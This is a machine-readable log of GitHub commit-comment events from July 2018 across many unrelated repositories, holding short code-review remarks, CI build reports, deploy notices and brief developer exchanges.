{"id":"7984230541","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":29753030,"position":267,"line":267,"path":"lib/node_modules/@stdlib/stats/incr/apcorr/test/test.js","commit_id":"80f96253bf726f33bc71d8eb68037ab203ae4cf9","created_at":"2018-07-18T16:55:20Z","updated_at":"2018-07-18T16:55:20Z","author_association":"MEMBER","body":"Done."}},"created_at":"2018-07-18T16:55:20Z"}
{"id":"7984233059","type":"CommitCommentEvent","actor":{"login":"karnikram"},"repo":{"name":"karnikram/autocalib-sensor-extrinsics"},"payload":{"comment":{"id":29753038,"position":15,"line":50,"path":"gui/core_gui/CCalibFromPlanesGui.cpp","commit_id":"ba670c2fd1fc84543429452ead9a7ade1b35b311","created_at":"2018-07-18T16:55:50Z","updated_at":"2018-07-18T16:55:50Z","author_association":"OWNER","body":"Sure\r\nI was thinking in terms of \"point cloud\" - \"plane cloud\" ;)"}},"created_at":"2018-07-18T16:55:50Z"}
{"id":"7984238460","type":"CommitCommentEvent","actor":{"login":"lebogan"},"repo":{"name":"kemalcr/kemal"},"payload":{"comment":{"id":29753048,"position":null,"line":null,"path":null,"commit_id":"09bb1fcd4073a374b3a61c99e48e05a866b23c08","created_at":"2018-07-18T16:56:50Z","updated_at":"2018-07-18T16:56:50Z","author_association":"CONTRIBUTOR","body":"Please, don't waste any more time on this. The PR was intended to be 'cosmetic'. It adds no real value to the code base. Kemal is probably the coolest thing since Sinatra. Please, focus on making it even cooler.\r\n\r\nThank you all."}},"created_at":"2018-07-18T16:56:50Z"}
{"id":"7984243581","type":"CommitCommentEvent","actor":{"login":"Gordin"},"repo":{"name":"meteor/simple-todos-react"},"payload":{"comment":{"id":29753056,"position":null,"line":null,"path":null,"commit_id":"4459f38b759d17ade45da61e67265fb48e6f39c5","created_at":"2018-07-18T16:57:49Z","updated_at":"2018-07-18T16:57:49Z","author_association":"NONE","body":"Just in case someone else finds this again: https://github.com/meteor/tutorials/issues/175\r\nThe correct way of fixing this would be\r\n```bash\r\nmeteor remove blaze-html-templates\r\nmeteor add static-html\r\n```\r\nThis guide explains it, but it's missing in the tutorial https://guide.meteor.com/react.html#using-with-meteor"}},"created_at":"2018-07-18T16:57:49Z"}
{"id":"7984243755","type":"CommitCommentEvent","actor":{"login":"chrishajas"},"repo":{"name":"greenplum-db/gpbackup"},"payload":{"comment":{"id":29753057,"position":44,"line":44,"path":"backup/history.go","commit_id":"55a76503a1a6b1c4bddcfff475193d20af5a5a18","created_at":"2018-07-18T16:57:51Z","updated_at":"2018-07-18T16:57:51Z","author_association":"MEMBER","body":"If no history file exists, we should do a verbose log statement."}},"created_at":"2018-07-18T16:57:51Z"}
{"id":"7984252626","type":"CommitCommentEvent","actor":{"login":"AlexPeshkoff"},"repo":{"name":"FirebirdSQL/firebird"},"payload":{"comment":{"id":29753073,"position":5,"line":66,"path":"src/msgs/messages2.sql","commit_id":"32ca23b4fc17d01c09e6400a41e313163ee4559a","created_at":"2018-07-18T16:59:35Z","updated_at":"2018-07-18T16:59:35Z","author_association":"MEMBER","body":"+1\n\nSent from MailDroid\n\n-----Original Message-----\nFrom: Dimitry Sibiryakov <notifications@github.com>\nTo: FirebirdSQL/firebird <firebird@noreply.github.com>\nCc: Subscribed <subscribed@noreply.github.com>\nSent: вт, 17 июл 2018 14:05\nSubject: Re: [FirebirdSQL/firebird] Fix CORE-5874 - Provide name of read-only column incorrectly referenced in UPDATE ... SET xxx. (32ca23b)\n\nWithout proper versioning of msg file it is a really bad idea to change existing messages. Either add a new message or add a secondary code.\n\n-- \nYou are receiving this because you are subscribed to this thread.\nReply to this email directly or view it on GitHub:\nhttps://github.com/FirebirdSQL/firebird/commit/32ca23b4fc17d01c09e6400a41e313163ee4559a#commitcomment-29733068"}},"created_at":"2018-07-18T16:59:35Z"}
{"id":"7984253444","type":"CommitCommentEvent","actor":{"login":"karnikram"},"repo":{"name":"karnikram/autocalib-sensor-extrinsics"},"payload":{"comment":{"id":29753075,"position":28,"line":58,"path":"gui/core_gui/CCalibFromPlanesGui.cpp","commit_id":"ba670c2fd1fc84543429452ead9a7ade1b35b311","created_at":"2018-07-18T16:59:44Z","updated_at":"2018-07-18T16:59:44Z","author_association":"OWNER","body":"Ok, sure"}},"created_at":"2018-07-18T16:59:44Z"}
{"id":"7984260249","type":"CommitCommentEvent","actor":{"login":"hoangpla8"},"repo":{"name":"hoangpla8/esp8266nodemcu-relay-mqtt"},"payload":{"comment":{"id":29753097,"position":22,"line":22,"path":"mqtt-relay-switch.ino","commit_id":"0efece857722b248db1eb68b43b61bdba0add13a","created_at":"2018-07-18T17:01:01Z","updated_at":"2018-07-18T17:01:01Z","author_association":"OWNER","body":"Ass"}},"created_at":"2018-07-18T17:01:01Z"}
{"id":"7984261063","type":"CommitCommentEvent","actor":{"login":"norgalades"},"repo":{"name":"swiip81/create_thehive_alert"},"payload":{"comment":{"id":29753098,"position":null,"line":null,"path":null,"commit_id":"3fbf7654cfe6a9c0b96b62a2e7987cc817047da6","created_at":"2018-07-18T17:01:10Z","updated_at":"2018-07-18T17:01:10Z","author_association":"NONE","body":"Well done ;) "}},"created_at":"2018-07-18T17:01:10Z"}
{"id":"7984261846","type":"CommitCommentEvent","actor":{"login":"Jameson13B"},"repo":{"name":"Jameson13B/front-end-project-week"},"payload":{"comment":{"id":29753100,"position":null,"line":null,"path":null,"commit_id":"2d69fc194234af1356d3454cefbb8c2a3a665d9a","created_at":"2018-07-18T17:01:18Z","updated_at":"2018-07-18T17:01:18Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Wire up your static React App to our Notes API.](https://trello.com/c/8ZXeYcd6/9-wire-up-your-static-react-app-to-our-notes-api)"}},"created_at":"2018-07-18T17:01:18Z"}
{"id":"7984265641","type":"CommitCommentEvent","actor":{"login":"Sdyess"},"repo":{"name":"azerothcore/azerothcore-wotlk"},"payload":{"comment":{"id":29753108,"position":null,"line":null,"path":null,"commit_id":"a5a130b95af6a6c1ea2e710ba435ea4dc3ee4372","created_at":"2018-07-18T17:02:04Z","updated_at":"2018-07-18T17:02:04Z","author_association":"NONE","body":"What's up with the function name? Should it not be OnLoadCustomDatabaseTable()?"}},"created_at":"2018-07-18T17:02:04Z"}
{"id":"7984266218","type":"CommitCommentEvent","actor":{"login":"donnerpeter"},"repo":{"name":"JetBrains/intellij-community"},"payload":{"comment":{"id":29753110,"position":12,"line":37,"path":"java/openapi/src/com/intellij/codeInsight/NullableNotNullDialog.java","commit_id":"1bd3a97d1f3731aa0f267b6d2c828a41c986c6a5","created_at":"2018-07-18T17:02:11Z","updated_at":"2018-07-18T17:02:11Z","author_association":"CONTRIBUTOR","body":"Fixed"}},"created_at":"2018-07-18T17:02:11Z"}
{"id":"7984276183","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29753122,"position":null,"line":null,"path":null,"commit_id":"027a42cabba480cab8743f2aa281731dace9a1ea","created_at":"2018-07-18T17:04:12Z","updated_at":"2018-07-18T17:04:12Z","author_association":"NONE","body":"#6517-MissingEqNumRefsInEngrgRef (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2940 of 2982 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 3 tests had: EIO diffs.\n * 2 tests had: ESO small diffs.\n * 42 tests had: Table big diffs.\n * 1 test had: ERR diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTR big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 601\n * Failed: 42\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-027a42cabba480cab8743f2aa281731dace9a1ea-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-027a42cabba480cab8743f2aa281731dace9a1ea-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-98.59%25-yellow.png)</a> \n"}},"created_at":"2018-07-18T17:04:12Z"}
{"id":"7984276739","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29753124,"position":null,"line":null,"path":null,"commit_id":"70d2c926dd0b5b68b189b82f6abfe113ca6a2dd6","created_at":"2018-07-18T17:04:19Z","updated_at":"2018-07-18T17:04:19Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [rsyncupdat](https://rsyncupdat-static-docs.pantheonsite.io/docs) Multidev environment:\n- [scripts/deploy-live.sh](https://github.com/pantheon-systems/documentation/commit/b0aec4a3b165fc9008e146250de802494a8ac9ec/scripts/deploy-live.sh)\n- [scripts/deploy-multidev.sh](https://github.com/pantheon-systems/documentation/commit/b0aec4a3b165fc9008e146250de802494a8ac9ec/scripts/deploy-multidev.sh)\n- [/docs/cache-control](https://rsyncupdat-static-docs.pantheonsite.io/docs/cache-control)\n- [/docs/caching-advanced-topics](https://rsyncupdat-static-docs.pantheonsite.io/docs/caching-advanced-topics)\n- [/docs/code](https://rsyncupdat-static-docs.pantheonsite.io/docs/code)\n"}},"created_at":"2018-07-18T17:04:19Z"}
{"id":"7984276977","type":"CommitCommentEvent","actor":{"login":"protonspring"},"repo":{"name":"miguel-l/Stockfish"},"payload":{"comment":{"id":29753127,"position":null,"line":null,"path":null,"commit_id":"c5adeec1a603483a84104fe93b427b573815fb0c","created_at":"2018-07-18T17:04:22Z","updated_at":"2018-07-18T17:04:22Z","author_association":"NONE","body":"Couldn't you calculate all of the rammed pawns in one operation?\r\n\r\nscore -= Rammed * popcount(pos.pieces(Us, PAWN) & shift<Down>(pos.pieces(Them, PAWN)));\r\n\r\nor similar?"}},"created_at":"2018-07-18T17:04:22Z"}
{"id":"7984281808","type":"CommitCommentEvent","actor":{"login":"swiip81"},"repo":{"name":"swiip81/create_thehive_alert"},"payload":{"comment":{"id":29753140,"position":null,"line":null,"path":null,"commit_id":"3fbf7654cfe6a9c0b96b62a2e7987cc817047da6","created_at":"2018-07-18T17:05:20Z","updated_at":"2018-07-18T17:05:20Z","author_association":"OWNER","body":"You did it so thank your @norgalades "}},"created_at":"2018-07-18T17:05:20Z"}
{"id":"7984287002","type":"CommitCommentEvent","actor":{"login":"basil-conto"},"repo":{"name":"abo-abo/swiper"},"payload":{"comment":{"id":29753146,"position":null,"line":null,"path":null,"commit_id":"d1d567ac6fb70b88342d9db4db2b2d4f89c10e29","created_at":"2018-07-18T17:06:22Z","updated_at":"2018-07-18T17:06:22Z","author_association":"CONTRIBUTOR","body":"How are you compiling this so that it emits a warning? What warning do you get?\r\n\r\nNone of the following commands give me any warnings pertaining to `find-tag-marker-ring`:\r\n1. `make emacs=emacs-27.0.50 compile`\r\n2. `make emacs=emacs26 compile`\r\n3. `make emacs=emacs25 compile`\r\n4. `make emacs=emacs24 compile`\r\n\r\nMy corresponding Emacs versions are the following:\r\n\r\n1.\r\n       In GNU Emacs 27.0.50 (build 1, x86_64-pc-linux-gnu, X toolkit, Xaw3d scroll bars)\r\n        of 2018-07-14 built on thunk\r\n       Repository revision: 155d7303808345dd73427302d9a352ec5461c11a\r\n       Windowing system distributor 'The X.Org Foundation', version 11.0.11906000\r\n       System Description: Debian GNU/Linux buster/sid\r\n\r\n2.\r\n       In GNU Emacs 26.1.50 (build 1, x86_64-pc-linux-gnu, X toolkit, Xaw3d scroll bars)\r\n        of 2018-07-07 built on thunk\r\n       Repository revision: 40e1db8ccd1239fc7da5ccd3f5f79017b2b44afc\r\n       Windowing system distributor 'The X.Org Foundation', version 11.0.11906000\r\n       System Description:     Debian GNU/Linux testing (buster)\r\n\r\n3.\r\n       In GNU Emacs 25.2.1 (x86_64-pc-linux-gnu, X toolkit, Xaw3d scroll bars)\r\n        of 2018-05-07, modified by Debian built on binet\r\n       Windowing system distributor 'The X.Org Foundation', version 11.0.11906000\r\n       System Description:     Debian GNU/Linux testing (buster)\r\n\r\n4.\r\n       In GNU Emacs 24.5.1 (x86_64-pc-linux-gnu, X toolkit, Xaw3d scroll bars)\r\n        of 2017-09-12 on hullmann, modified by Debian\r\n       Windowing system distributor `The X.Org Foundation', version 11.0.11906000\r\n       System Description:      Debian GNU/Linux testing (buster)\r\n\r\nThis is with a checkout of Swiperc commit d8d3cbd32bb132b4819340d2fffed4fb52007962."}},"created_at":"2018-07-18T17:06:22Z"}
{"id":"7984292623","type":"CommitCommentEvent","actor":{"login":"MatiasPi"},"repo":{"name":"MatiasPi/online-notepad"},"payload":{"comment":{"id":29753159,"position":null,"line":null,"path":null,"commit_id":"dcb6a495c679bcaeb4aa1d20daddee5c11d48aa5","created_at":"2018-07-18T17:07:31Z","updated_at":"2018-07-18T17:07:31Z","author_association":"OWNER","body":"\"to fix bug with Yomichan\""}},"created_at":"2018-07-18T17:07:31Z"}
{"id":"7984292688","type":"CommitCommentEvent","actor":{"login":"yglukhov"},"repo":{"name":"yglukhov/nimpy"},"payload":{"comment":{"id":29753160,"position":null,"line":null,"path":null,"commit_id":"24d9e43bda62d45d46b50a18a58b7dcdb4dace13","created_at":"2018-07-18T17:07:32Z","updated_at":"2018-07-18T17:07:32Z","author_association":"OWNER","body":"Should be good now. Please confirm."}},"created_at":"2018-07-18T17:07:32Z"}
{"id":"7984293876","type":"CommitCommentEvent","actor":{"login":"Alvinwalker"},"repo":{"name":"blockchain/My-Wallet-V3"},"payload":{"comment":{"id":29753165,"position":5,"line":4,"path":"package.json","commit_id":"6e736d4cce41f47f6699192e7b20baa1df39eab3","created_at":"2018-07-18T17:07:47Z","updated_at":"2018-07-18T17:07:47Z","author_association":"NONE","body":"👍"}},"created_at":"2018-07-18T17:07:47Z"}
{"id":"7984294366","type":"CommitCommentEvent","actor":{"login":"theMultitude"},"repo":{"name":"tgreenhalgh/front-end-project-week"},"payload":{"comment":{"id":29753166,"position":null,"line":null,"path":null,"commit_id":"aed885c63102d7931ccfe1b9728483fac48a158d","created_at":"2018-07-18T17:07:53Z","updated_at":"2018-07-18T17:07:53Z","author_association":"NONE","body":"I didn't see a specific commit for comments so i'll just toss a message here.  What you have looks good but more would be better! By that I mean descriptions at the tops of methods describing what is going on inside that method.  It shouldn't be longer than 10 words for the most part.  Otherwise the code looks good! The styled components are pretty unique.  "}},"created_at":"2018-07-18T17:07:53Z"}
{"id":"7984303971","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29753186,"position":null,"line":null,"path":null,"commit_id":"027a42cabba480cab8743f2aa281731dace9a1ea","created_at":"2018-07-18T17:09:50Z","updated_at":"2018-07-18T17:09:50Z","author_association":"NONE","body":"#6517-MissingEqNumRefsInEngrgRef (RKStrand) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-027a42cabba480cab8743f2aa281731dace9a1ea-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-18T17:09:50Z"}
{"id":"7984305373","type":"CommitCommentEvent","actor":{"login":"Dansteve"},"repo":{"name":"elevowofficial/Super-Duper-Crypto"},"payload":{"comment":{"id":29753190,"position":null,"line":null,"path":null,"commit_id":"38e217f339038d6eea1d6c3f000c8d0ec6d34ec1","created_at":"2018-07-18T17:10:09Z","updated_at":"2018-07-18T17:10:09Z","author_association":"COLLABORATOR","body":"@elevowofficial i can finish code, please message me at Dansteveade1"}},"created_at":"2018-07-18T17:10:09Z"}
{"id":"7984305784","type":"CommitCommentEvent","actor":{"login":"wspresto"},"repo":{"name":"wspresto/audiodio-take-two"},"payload":{"comment":{"id":29753192,"position":14,"line":236,"path":"src/providers/audio-session/audio-session.ts","commit_id":"38ae5981188dbebe56adee6a676cca114188358a","created_at":"2018-07-18T17:10:13Z","updated_at":"2018-07-18T17:10:13Z","author_association":"OWNER","body":"Do we need to check for isNativeSession?"}},"created_at":"2018-07-18T17:10:13Z"}
{"id":"7984309399","type":"CommitCommentEvent","actor":{"login":"theMultitude"},"repo":{"name":"TheDeterminator/front-end-project-week"},"payload":{"comment":{"id":29753199,"position":null,"line":null,"path":null,"commit_id":"6de2bf9881ea8d3c3ea62d69bb8a5e2b725c08d7","created_at":"2018-07-18T17:10:59Z","updated_at":"2018-07-18T17:10:59Z","author_association":"NONE","body":"Comments look great!  Not overly verbose but informative.  Alec strikes again! :+1: "}},"created_at":"2018-07-18T17:10:59Z"}
{"id":"7984310544","type":"CommitCommentEvent","actor":{"login":"Dansteve"},"repo":{"name":"Dansteve/Super-Duper-Crypto"},"payload":{"comment":{"id":29753201,"position":null,"line":null,"path":null,"commit_id":"3c6a9e17c4da88d6e61d5100a7b04554afa02a0f","created_at":"2018-07-18T17:11:13Z","updated_at":"2018-07-18T17:11:13Z","author_association":"OWNER","body":"i can continue the project just send me a message at \"Dansteveade1\" on fiverr\r\n@elevowofficial , @dansteve"}},"created_at":"2018-07-18T17:11:13Z"}
{"id":"7984313532","type":"CommitCommentEvent","actor":{"login":"bowans"},"repo":{"name":"bowans/slay-the-spire-zht-localization"},"payload":{"comment":{"id":29753207,"position":null,"line":null,"path":null,"commit_id":"392cf420e94d0598cf8289e57c265fa0bee3fbbf","created_at":"2018-07-18T17:11:50Z","updated_at":"2018-07-18T17:11:50Z","author_association":"OWNER","body":"這個修正到 zhs2zht 了， zht fixed in https://github.com/bowans/slay-the-spire-zht-localization/commit/4bf64e4dfc16750339b5bc40afce674a331ee0ba."}},"created_at":"2018-07-18T17:11:50Z"}
{"id":"7984318255","type":"CommitCommentEvent","actor":{"login":"sophiadmello"},"repo":{"name":"sophiadmello/Sophia"},"payload":{"comment":{"id":29753216,"position":null,"line":null,"path":null,"commit_id":"49d8b056a70669968cb6b6fea7506fb876d31df7","created_at":"2018-07-18T17:12:49Z","updated_at":"2018-07-18T17:12:49Z","author_association":"OWNER","body":"Adding to run get pull"}},"created_at":"2018-07-18T17:12:49Z"}
{"id":"7984318959","type":"CommitCommentEvent","actor":{"login":"luisreiskeys"},"repo":{"name":"rohitshampur/react-native-background-timer"},"payload":{"comment":{"id":29753219,"position":null,"line":null,"path":null,"commit_id":"a1a94f68e9865b22247edbf43171dabc530c6ea7","created_at":"2018-07-18T17:12:58Z","updated_at":"2018-07-18T17:12:58Z","author_association":"NONE","body":"I Solved my issues https://github.com/luisreiskeys/react-native-background-timer"}},"created_at":"2018-07-18T17:12:58Z"}
{"id":"7984319243","type":"CommitCommentEvent","actor":{"login":"peterjdev"},"repo":{"name":"Codeception/Stub"},"payload":{"comment":{"id":29753222,"position":null,"line":null,"path":null,"commit_id":"afa7fd28aff8953421214ae74e5a662e5d89e7bf","created_at":"2018-07-18T17:13:01Z","updated_at":"2018-07-18T17:13:01Z","author_association":"NONE","body":"Thanks for getting back to me. The versions of phpunit and phpunit-mock-objects did not change before and after this change. I'm using an exact version constraint on the codeception package to reproduce the error. I get the error when I call `Stub::make()`. \r\n\r\n`codeception/codeception              2.4.1 => 2.4.2`\r\n`codeception/stub                            1.0.4 => 2.0.1`\r\n`phpunit/phpunit                               7.1.5`\r\n`phpunit/phpunit-mock-objects      6.1.2`\r\n\r\n\r\n  "}},"created_at":"2018-07-18T17:13:01Z"}
{"id":"7984319460","type":"CommitCommentEvent","actor":{"login":"professor"},"repo":{"name":"greenplum-db/gpbackup"},"payload":{"comment":{"id":29753223,"position":17,"line":30,"path":"Gopkg.lock","commit_id":"55a76503a1a6b1c4bddcfff475193d20af5a5a18","created_at":"2018-07-18T17:13:04Z","updated_at":"2018-07-18T17:13:04Z","author_association":"CONTRIBUTOR","body":"FYI. MPL is already listed in our scotzilla sheet. If we add this package, please update our tracking of licenses."}},"created_at":"2018-07-18T17:13:04Z"}
{"id":"7984320028","type":"CommitCommentEvent","actor":{"login":"DongLaStrada"},"repo":{"name":"DongLaStrada/DongLaStrada.github.io"},"payload":{"comment":{"id":29753225,"position":null,"line":null,"path":null,"commit_id":"f77201101f6d6688143c3bdc2921c05c9286007f","created_at":"2018-07-18T17:13:11Z","updated_at":"2018-07-18T17:13:11Z","author_association":"OWNER","body":"提交"}},"created_at":"2018-07-18T17:13:11Z"}
{"id":"7984323675","type":"CommitCommentEvent","actor":{"login":"jemalicisou"},"repo":{"name":"jemalicisou/ProgrammingAssignment2"},"payload":{"comment":{"id":29753237,"position":null,"line":null,"path":null,"commit_id":"6d21cc0ec07a2711c91cecbda9edcbf7b87a17be","created_at":"2018-07-18T17:13:56Z","updated_at":"2018-07-18T17:13:56Z","author_association":"OWNER","body":"Resolução do exercício."}},"created_at":"2018-07-18T17:13:56Z"}
{"id":"7984327818","type":"CommitCommentEvent","actor":{"login":"mtvbrianking"},"repo":{"name":"mtvbrianking/multi-auth"},"payload":{"comment":{"id":29753241,"position":null,"line":null,"path":null,"commit_id":"98848878f3e8b7b9ed5d6c1f08ee2bbe6b29acfb","created_at":"2018-07-18T17:14:51Z","updated_at":"2018-07-18T17:14:51Z","author_association":"OWNER","body":"**Fix** [`View [auth.passwords.reset] not found.`](https://github.com/mtvbrianking/multi-auth/issues/4)"}},"created_at":"2018-07-18T17:14:51Z"}
{"id":"7984328744","type":"CommitCommentEvent","actor":{"login":"kzinserspokeo"},"repo":{"name":"Spokeo/api_authenticator"},"payload":{"comment":{"id":29753243,"position":null,"line":null,"path":null,"commit_id":"c304ca10d029893af74fb1b97d47b2334edb4f3c","created_at":"2018-07-18T17:15:02Z","updated_at":"2018-07-18T17:15:02Z","author_association":"NONE","body":"is this really austin or a ghost. blink once for yes and twice for no."}},"created_at":"2018-07-18T17:15:02Z"}
{"id":"7984334825","type":"CommitCommentEvent","actor":{"login":"chrishajas"},"repo":{"name":"greenplum-db/gpbackup"},"payload":{"comment":{"id":29753255,"position":74,"line":74,"path":"backup/history_test.go","commit_id":"55a76503a1a6b1c4bddcfff475193d20af5a5a18","created_at":"2018-07-18T17:16:17Z","updated_at":"2018-07-18T17:16:17Z","author_association":"MEMBER","body":"Does this test the case where the  there is an existing list of timestamps {3,1} and we add the timestamp 2, and assert the final list is {3,2,1}?"}},"created_at":"2018-07-18T17:16:17Z"}
{"id":"7984337156","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"Ronimeister/NET.S.2018.Kanunnikov.09"},"payload":{"comment":{"id":29753262,"position":null,"line":null,"path":null,"commit_id":"b819e61e4363ea01fbb41d1d8c22110e6fa1a84f","created_at":"2018-07-18T17:16:45Z","updated_at":"2018-07-18T17:16:45Z","author_association":"NONE","body":"В данной сортировке наличие дефолтного компаратора не имеет смысла, задумайтесь, что будет от такой сортировки ожидать код, который не знает деталей реализации. Дефолтное сравнение имеет место быть только в случае, когда для типов выполняется отношение порядка (IComparable), что не логично для двух элементов типа int[]."}},"created_at":"2018-07-18T17:16:45Z"}
{"id":"7984337402","type":"CommitCommentEvent","actor":{"login":"Sija"},"repo":{"name":"kemalcr/kemal"},"payload":{"comment":{"id":29753263,"position":null,"line":null,"path":null,"commit_id":"09bb1fcd4073a374b3a61c99e48e05a866b23c08","created_at":"2018-07-18T17:16:48Z","updated_at":"2018-07-18T17:16:48Z","author_association":"CONTRIBUTOR","body":">[...] The PR was intended to be 'cosmetic'. It adds no real value to the code base. [...]\r\n\r\n@lebogan Well, it adds value in a sense of a 🕦💣 (ticking bomb) waiting to explode on CI at very next release. I know what I'd do in your position: I'd send a followup PR fixing this."}},"created_at":"2018-07-18T17:16:48Z"}
{"id":"7984344470","type":"CommitCommentEvent","actor":{"login":"TeiXeR"},"repo":{"name":"Ludeon/RimWorld-de"},"payload":{"comment":{"id":29753274,"position":null,"line":null,"path":null,"commit_id":"efc8cdad34af0fe3015985e1a8198ac3fcd4d582","created_at":"2018-07-18T17:18:12Z","updated_at":"2018-07-18T17:18:12Z","author_association":"CONTRIBUTOR","body":"Die englischen Texte enthalten zwar auch oft \"he\" anstatt [PAWN_pronoun], aber die Änderungen sollten innerhalb des Spiels zu keinen Problemen führen, da das Geschlecht der Person das Pronomen damit automatisch anpasst.\r\nAuf diese Weise kommen weniger Fehler zustande, falls es sich mal doch um eine weibliche Person handelt."}},"created_at":"2018-07-18T17:18:12Z"}
{"id":"7984345146","type":"CommitCommentEvent","actor":{"login":"Nelyah"},"repo":{"name":"Nelyah/dotfiles"},"payload":{"comment":{"id":29753276,"position":11,"line":8,"path":".config/ranger/colorschemes/my_colourscheme.py","commit_id":"a04002f5de335624720e37130edd18f0a8e0e61c","created_at":"2018-07-18T17:18:20Z","updated_at":"2018-07-18T17:18:20Z","author_association":"OWNER","body":"Thanks for the feedback! I fixed that in 4cfb164\r\n`os.getenv` actually returns `None` if the environment variable isn't set, so simply setting the list to `[]` fixes the issues."}},"created_at":"2018-07-18T17:18:20Z"}
{"id":"7984346035","type":"CommitCommentEvent","actor":{"login":"karnikram"},"repo":{"name":"karnikram/autocalib-sensor-extrinsics"},"payload":{"comment":{"id":29753279,"position":121,"line":153,"path":"gui/core_gui/CCalibFromPlanesGui.cpp","commit_id":"ba670c2fd1fc84543429452ead9a7ade1b35b311","created_at":"2018-07-18T17:18:30Z","updated_at":"2018-07-18T17:18:30Z","author_association":"OWNER","body":"In this case we don't actually know what the size of sensor_segmented_planes (vector of vector of planes) is going to be. We don't know how many unique observations are going to be there for the given number of sets before hand.. "}},"created_at":"2018-07-18T17:18:30Z"}
{"id":"7984352030","type":"CommitCommentEvent","actor":{"login":"chrishajas"},"repo":{"name":"greenplum-db/gpbackup"},"payload":{"comment":{"id":29753282,"position":85,"line":85,"path":"backup/history.go","commit_id":"55a76503a1a6b1c4bddcfff475193d20af5a5a18","created_at":"2018-07-18T17:19:44Z","updated_at":"2018-07-18T17:19:44Z","author_association":"MEMBER","body":"We might want to log a verbose message as we try to unlock the file so we can tell if the backup is hanging trying to acquire the lock."}},"created_at":"2018-07-18T17:19:44Z"}
{"id":"7984352579","type":"CommitCommentEvent","actor":{"login":"sinkingsugar"},"repo":{"name":"yglukhov/nimpy"},"payload":{"comment":{"id":29753283,"position":null,"line":null,"path":null,"commit_id":"24d9e43bda62d45d46b50a18a58b7dcdb4dace13","created_at":"2018-07-18T17:19:51Z","updated_at":"2018-07-18T17:19:51Z","author_association":"NONE","body":"Tested your version, works fine.\r\n\r\nBut I fixed it this way on my side:\r\nhttps://github.com/fragcolor-xyz/nimpy/commit/dac219c8d6fae6a796ef8d930c4383a0ef30d4d0\r\n\r\nnot sure what's the right way but on python manual says it should inject current path if you pass 0\r\nhttps://docs.python.org/2/c-api/init.html#c.PySys_SetArgvEx\r\n\r\nI'll pull your version later anyway :+1: "}},"created_at":"2018-07-18T17:19:51Z"}
{"id":"7984355609","type":"CommitCommentEvent","actor":{"login":"Morganamilo"},"repo":{"name":"ejmg/an-idiots-guide-to-installing-arch-on-a-lenovo-carbon-x1-gen-6"},"payload":{"comment":{"id":29753286,"position":8,"line":97,"path":"README.org","commit_id":"0286bf48e30c505393b38a5d60eefbccbf75e24d","created_at":"2018-07-18T17:20:29Z","updated_at":"2018-07-18T17:20:29Z","author_association":"NONE","body":"If you open an issue yourself you use checkboxes instead of bullet points and click each point as it gets done ;)"}},"created_at":"2018-07-18T17:20:29Z"}
{"id":"7984356828","type":"CommitCommentEvent","actor":{"login":"mdmohasin"},"repo":{"name":"mdmohasin/NodeServer"},"payload":{"comment":{"id":29753287,"position":null,"line":null,"path":null,"commit_id":"d15507b274ecf272a6e54b6adba74c2a80d04d4a","created_at":"2018-07-18T17:20:43Z","updated_at":"2018-07-18T17:20:43Z","author_association":"OWNER","body":"Merged devlatest to master"}},"created_at":"2018-07-18T17:20:43Z"}
{"id":"7984357267","type":"CommitCommentEvent","actor":{"login":"epdubiso"},"repo":{"name":"epdubiso/P2-Branch-Pull-Merge-Repeat"},"payload":{"comment":{"id":29753288,"position":null,"line":null,"path":null,"commit_id":"64e80cd9bd02bd39aece05b2585d9025f9ad5f09","created_at":"2018-07-18T17:20:48Z","updated_at":"2018-07-18T17:20:48Z","author_association":"OWNER","body":"Looks really good!"}},"created_at":"2018-07-18T17:20:48Z"}
{"id":"7984360254","type":"CommitCommentEvent","actor":{"login":"yglukhov"},"repo":{"name":"yglukhov/nimpy"},"payload":{"comment":{"id":29753293,"position":null,"line":null,"path":null,"commit_id":"24d9e43bda62d45d46b50a18a58b7dcdb4dace13","created_at":"2018-07-18T17:21:24Z","updated_at":"2018-07-18T17:21:24Z","author_association":"OWNER","body":"Oh that's even cleaner. I'll do it your way."}},"created_at":"2018-07-18T17:21:24Z"}
{"id":"7984363721","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29753299,"position":null,"line":null,"path":null,"commit_id":"9c4e0d9307ecd06fc0f94835354835946ae7a0b6","created_at":"2018-07-18T17:22:08Z","updated_at":"2018-07-18T17:22:08Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-229](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-229).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-229-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-18T17:22:08Z"}
